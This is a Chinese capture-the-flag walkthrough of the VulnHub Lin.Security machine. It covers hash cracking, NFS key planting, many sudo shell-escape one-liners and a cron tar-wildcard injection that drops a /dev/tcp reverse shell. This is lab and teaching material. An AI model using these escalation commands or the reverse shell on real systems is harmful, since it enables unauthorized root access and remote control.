[vulnhub]Lin.Security主机Linux提权

Hash Crack(Hash cat)

bob@linsecurity:~$ cat /etc/passwd

image-2.png

$ echo "AzER3pBZh6WZE">hash

检查哈希类型:

$ hash-identifier AzER3pBZh6WZE

image-3.png

$ hashcat -m 1500 -a 0 hash /usr/share/wordlists/rockyou.txt --force

image-4.png

username:insecurity
password:AzER3pBZh6WZE:P@ssw0rd

image-5.png

NFS

$ showmount -e 192.168.8.104

Export list for 192.168.8.104:
/home/peter *

挂载到peter

获取关于peter的信息

image-6.png

peter的UDI是1001

$ sudo mkdir /mnt/lin_peter
$ sudo adduser -u 1001 peter

创建用户peter.

image-7.png

$ sudo mount 192.168.8.104:/home/peter /mnt/lin_peter -o vers=3

$ sudo ls /mnt/lin_peter -la

$ su peter

(peter)$ ssh-keygen -t ssh-rsa
(peter)$ mkdir /mnt/lin_peter/.ssh/
(peter)$ cp ~/.ssh/id_rsa.pub /mnt/lin_peter/.ssh/authorized_keys

image-8.png

(peter)$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ~/.ssh/id_rsa peter@192.168.8.104

image-9.png

Root

修改NFS的共享文件夹

peter@linsecurity:~$ cat /etc/exports

image-10.png

image-11.png

发现关于strace权限提升

image-12.png.

$ sudo strace -o /dev/null /bin/sh

image-13.png

Sudo

bob@linsecurity:~$ sudo -l

image-15.png

Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less,
        /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh,
        /usr/bin/git, /usr/bin/script, /usr/bin/scp

ash

ash(Almquist Shell)是一个轻量级、高效的 Unix/Linux 命令行解释器,常用于嵌入式系统和资源受限的环境中。

$ sudo ash

awk

awk 是一个用于在 Unix/Linux 系统中进行模式匹配和文本处理的强大工具和编程语言。

sudo awk 'BEGIN {system("/bin/sh")}'

bash

bash 是一个广泛使用的 Unix/Linux 命令行解释器和脚本语言,提供强大的交互和自动化功能。

sudo /bin/bash

csh

csh 是一种基于 C 语言语法的 Unix 命令行解释器,提供丰富的编程功能和用户交互特性。

sudo csh

dash

dash 是一个轻量级且符合 POSIX 标准的 Unix/Linux 命令行解释器,专为快速执行脚本而设计。

sudo dash

ed

ed是一个基于命令行的行编辑器,用于在Unix和类Unix系统中进行基本的文本编辑操作。

sudo ed
!/bin/sh

env

env是一个用于显示或设置环境变量的命令行工具,在Unix和类Unix系统中被广泛使用。

sudo env /bin/sh

expect

expect是一种用于编写和执行交互式脚本的自动化工具,常用于模拟人类用户与命令行程序或脚本的交互过程。

sudo expect -c 'spawn /bin/sh;interact'

find

find是一个用于在文件系统中搜索文件和目录的命令行工具,支持多种搜索条件和操作。

sudo find . -exec /bin/sh \; -quit

ftp

ftp是一种用于在计算机之间传输文件的标准网络协议和命令行工具,支持文件传输、目录操作、权限设置等功能。

sudo ftp
!/bin/sh

less

less是一个命令行文本查看器,用于分页显示文本文件内容,并支持搜索、导航等功能,适用于查看大型文本文件。

sudo less /etc/profile
!/bin/sh

git

git是一个分布式版本控制系统,用于跟踪文件的更改并协调多人协作开发项目,提供了版本控制、分支管理、远程仓库等功能。

A

这会调用默认的分页器,通常是less,其他功能可能也适用。

sudo git -p help config
!/bin/sh

B

帮助系统也可以从任何 git 命令中访问,例如 git branch。这会调用默认的分页器,通常是 less,其他功能可能也适用。

sudo git branch --help config
!/bin/sh

C

Git钩子仅仅是shell脚本,在下面的示例中,使用了与预提交动作相关联的钩子。任何其他的钩子也可以工作,只需确保能够执行适当的操作来触发它。现有的存储库也可以使用,并且进入该目录也可以,即,可以不使用 -C 选项。

TF=$(mktemp -d)
ln -s /bin/sh "$TF/git-x"
sudo git "--exec-path=$TF" x

man

man是一个命令行工具,用于查看Unix和类Unix系统中命令、函数和配置文件等的详细手册页,提供了丰富的帮助信息和文档阅读功能。

sudo man man
!/bin/sh

more

more是一个命令行工具,用于逐页显示文本文件内容,支持基本的浏览和搜索操作,适用于查看较小的文本文件。

TERM= sudo more /etc/profile
!/bin/sh

scp

scp是基于SSH协议的文件传输工具,用于在Unix和类Unix系统之间安全地传输文件,支持加密传输、远程复制、文件权限保持等功能。

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

socat

socat是一个用于在Unix系统中建立双向数据流连接的网络工具,支持各种类
型的连接、数据传输、代理功能等。

sudo socat stdin exec:/bin/sh

ssh

ssh是一种安全的远程登录和数据传输协议,提供了加密通信、身份验证、端口转发等功能,用于在计算机之间建立安全的连接和传输数据。

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

vi

vi是一款在Unix和类Unix系统中常用的文本编辑器,具有模式切换、编辑操作、命令执行等功能,适用于在终端环境下进行文本编辑。

sudo vi -c ':!/bin/sh' /dev/null

zsh

zsh是一种功能强大的命令行解释器,具有丰富的特性和高度的可定制性,提供了智能补全、历史命令管理、多种主题样式等功能,适用于提高命令行操作效率和舒适度。

sudo zsh

pico

pico是一个简单易用的文本编辑器,提供了基本的编辑功能,适用于在终端环境下进行简单的文本编辑任务。

sudo pico
^R^X
reset; sh 1>&0 2>&0

rvim

rvim可能是Vim编辑器的简化版本,提供了简化的功能和基本的编辑功能,适用于初学者或需要快速编辑文件的场景。

A

This requires that rvim is compiled with Python support. Prepend :py3 for Python 3.

sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

B

This requires that rvim is compiled with Lua support.

sudo rvim -c ':lua os.execute("reset; exec sh")'

perl

Perl是一种通用的脚本编程语言,具有强大的文本处理能力和广泛的应用领域,适用于各种编程任务和场景。

sudo perl -e 'exec "/bin/sh";'

tclsh

tclsh是Tcl的解释器,提供了一个交互式的环境,用于执行Tcl语句和脚本。

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

script

script命令用于记录和保存当前终端会话的所有输入和输出内容到一个文件中。

sudo script -q /dev/null

crontab

查看机器定时任务

image-18.png

image-19.png

在目录/home/bob创建文件,进行命令参数注入

image-20.png

$ echo "" > --checkpoint=1
$ echo '/bin/bash -i >& /dev/tcp/192.168.8.103/10032 0>&1'>reverse.sh
$ chmod +x reverse.sh
echo "" > "--checkpoint-action=exec=sh reverse.sh"

等待几分钟即可获得反向shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/694860.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

大模型PEFT(二) 之 大模型LoRA指令微调学习记录

1.peft 1.1 微调方法批处理大小模式GPU显存速度 1.2 当前高效微调技术存在的一些问题 当前的高效微调技术很难在类似方法之间进行直接比较并评估它们的真实性能&#xff0c;主要的原因如下所示: 参数计算口径不一致:参数计算可以分为三类: 可训练参数的数量、微调模型与原…

406. 根据身高重建队列(中等)

406. 根据身高重建队列 1. 题目描述2.详细题解3.代码实现3.1 Python3.2 Java 1. 题目描述 题目中转&#xff1a;406. 根据身高重建队列 2.详细题解 做一道题之前先静心&#xff0c;默念三遍一切反动派都是纸老虎。已知一个队列&#xff0c;队列中每个数据表示一个属性&#xf…

保利威观看页SDK 官方VUE开源项目 polyv-web-live-watch-sdk

一、安装&#xff1a;node、npm 二、下载源码 polyv-web-live-watch-sdk: 保利威直播观看 SDK 官方文档&#xff1a;保利威帮助中心 进入项目根目录 npm ci #安装依赖&#xff0c;如果 CI 失败&#xff0c;请试一下 npm ci --no-cache --registryhttps://registry.npmmirr…

OpenCV绘制直线

一 绘制图形 画线 画矩形 画圆 画椭圆 画多边形 绘制字体 二 画线 line(img,开始点&#xff0c;结束点&#xff0c;颜色…) 参数结束 img&#xff1a;在那个图像上画线 开始点,结束点&#xff1a;指定线的开始与结束位置&#xff1b; 颜色&#xff0c;线宽&#xff0c;线体…

C++ MPI多进程并发

下载 用法 mpiexec -n 8 $PROCESS_COUNT x64\Debug\$TARGET.exe 多进程并发启动 mpiexec -f hosts.txt -n 3 $PROCESS_COUNT x64\Debug\$TARGET.exe 联机并发进程&#xff0c;其它联机电脑需在相同路径下有所有程序 //hosts.txt 192.168.86.16 192.168.86.123 192.168…

1025 反转链表

solution 模拟链表&#xff1a;记录链表中第i个元素的地址&#xff0c;再记录每个给定地址的对应数据和下一结点地址。注意给出的结点可能有的无效 #include<iostream> #include<algorithm> using namespace std; const int maxn 1e5 10; int main(){int n, k,…

云服务器Ubuntu系统的vim-plus(youcompleteme)完整安装

一. 安装vim-plus PS&#xff1a;需要在那个用户下配置vim-plus&#xff0c;就到那个用户下执行代码 git clone https://github.com/chxuan/vimplus.git ~/.vimplus cd ~/.vimplus ./install.sh二. 解决没有代码自动补全的问题 随便创建一个Test.cpp文件&#xff0c;vim打开…

【电机控制】FOC算法验证步骤

【电机控制】FOC算法验证步骤 文章目录 前言一、PWM——不接电机1、PWMA-H-50%2、PWMB-H-25%3、PWMC-H-0%4、PWMA-L-50%5、PWMB-L-75%6、PWMC-L-100% 二、ADC——不接电机1.电流零点稳定性、ADC读取的OFFSET2.电流钳准备3.运放电路分析1.电路OFFSET2.AOP3.采样电路的采样值范围…

跑滴滴能赚多少?

今天看到一个帖子。 35岁&#xff0c;已经失业3个月了。现在重新考虑工作的方式和意义。正在经历中年人的危机&#xff0c;是继续像之前那样工作&#xff0c;还是重新开启一段新的工作方式&#xff1f;这个问题一直在我脑海中盘旋。 工作的目的就是赚钱。只要能找到赚钱的方式&…

Flutter项目开发模版,开箱即用

前言 当前案例 Flutter SDK版本&#xff1a;3.22.2 每当我们开始一个新项目&#xff0c;都会 引入常用库、封装工具类&#xff0c;配置环境等等&#xff0c;我参考了一些文档&#xff0c;将这些内容整合、简单修改、二次封装&#xff0c;得到了一个开箱即用的Flutter开发模版…

基于STM32开发的智能语音助理系统

⬇帮大家整理了单片机的资料 包括stm32的项目合集【源码开发文档】 点击下方蓝字即可领取&#xff0c;感谢支持&#xff01;⬇ 点击领取更多嵌入式详细资料 问题讨论&#xff0c;stm32的资料领取可以私信&#xff01; 目录 引言环境准备智能语音助理系统基础代码实现&#xff…

《python程序语言设计》2018版第5章第47题绘制随机球,在一个宽120高100的矩形里绘制随机的点

这个题其实并不难。 首先我们利用turtle功能绘制一个矩形&#xff0c;圆心点题里要求的是0&#xff0c;0 这个好办 然后我们根据宽120&#xff0c;高100计算一下。肯定是正负两个值参与其中。 坐标点如下 建立矩形代码如下 turtle.penup() turtle.goto(-60, 50) turtle.pend…

HQChart小程序教程4-动态控制手势滚动页面

动态控制手势滚动页面 示例效果canvas 控制页面滚动属性步骤1. 使用变量绑定disable-scroll2. 在手势处理函数中控制是否滚动页面 交流QQ群HQChart代码地址 示例效果 canvas 控制页面滚动属性 根据官方文档&#xff0c;disable-scroll 属性是控制画布手势是否可以滚动页面。 h…

解读下/etc/network/interfaces配置文件

/etc/network/interfaces 是一个常见的网络配置文件&#xff0c;通常在 Debian 及其衍生版本的 Linux 发行版中使用。该文件用于配置网络接口和网络连接参数&#xff0c;允许用户手动设置网络连接的属性&#xff0c;包括 IP 地址、子网掩码、网关、DNS 服务器等。 以下是一个可…

领导者在沟通中最容易犯的错误

本文讨论了领导者在沟通过程中如何避免成为传声筒&#xff0c;通过筛选、处理和总结信息&#xff0c;在向上、向下沟通时保持相关性和真实性&#xff0c;提高沟通效率和效果。原文: The Dumbest Mistake Leaders Make in Communication 中层管理者作为高层领导、下属团队和其他…

Effective Java 2 遇到多个构造器参数时要考虑使用构建器

第2个经验法则&#xff1a;用遇到多个构造器参数时要考虑使用构建器&#xff08;consider a builder when faced with many constructor parameters&#xff09; 上一条讨论了静态工厂相对于构造器来说有五大优势。但静态工厂和构造器有个共同的局限性:它 们都不能很好地扩展到…

【计算机毕业设计】283基于微信小程序校园订餐

&#x1f64a;作者简介&#xff1a;拥有多年开发工作经验&#xff0c;分享技术代码帮助学生学习&#xff0c;独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。&#x1f339;赠送计算机毕业设计600个选题excel文件&#xff0c;帮助大学选题。赠送开题报告模板&#xff…

大水文之------端午练练JS好了

最近有点不太知道要干啥了&#xff0c;昨天看了集cocos的介绍&#xff0c;下载了个DashBoard&#xff0c;看了看里面的内容&#xff0c;确实有点小震惊&#xff0c;还有些免费的源码可以学习&#xff0c;挺好的。 昨天学习ts&#xff0c;感觉自己的js水平好像不太行&#xff0c…

【LeetCode】两数相加(基于单向链表)难度:中等

目录 理清题目 解题思路 题目代码 运行结果 我们来看一下题目描述&#xff1a; 理清题目 首先题目要求链表中的节点的值必须在[0,9]之间也就是说我们要处理的数字必为正整数&#xff0c;因此就不会涉及到太复杂的计算&#xff0c;题目其实就是要求对两个链表中的节点的值分…

【文件导出2】导出html文件数据

导出html文件数据 文章目录 导出html文件数据前言一、实现代码1.controller层2.接口层3.接口实现类4.FileUtil 工具类 二、文件导出效果总结 前言 springBoot项目实现在线导出html文件数据的功能。 一、实现代码 1.controller层 GetMapping("/record/_export") Ap…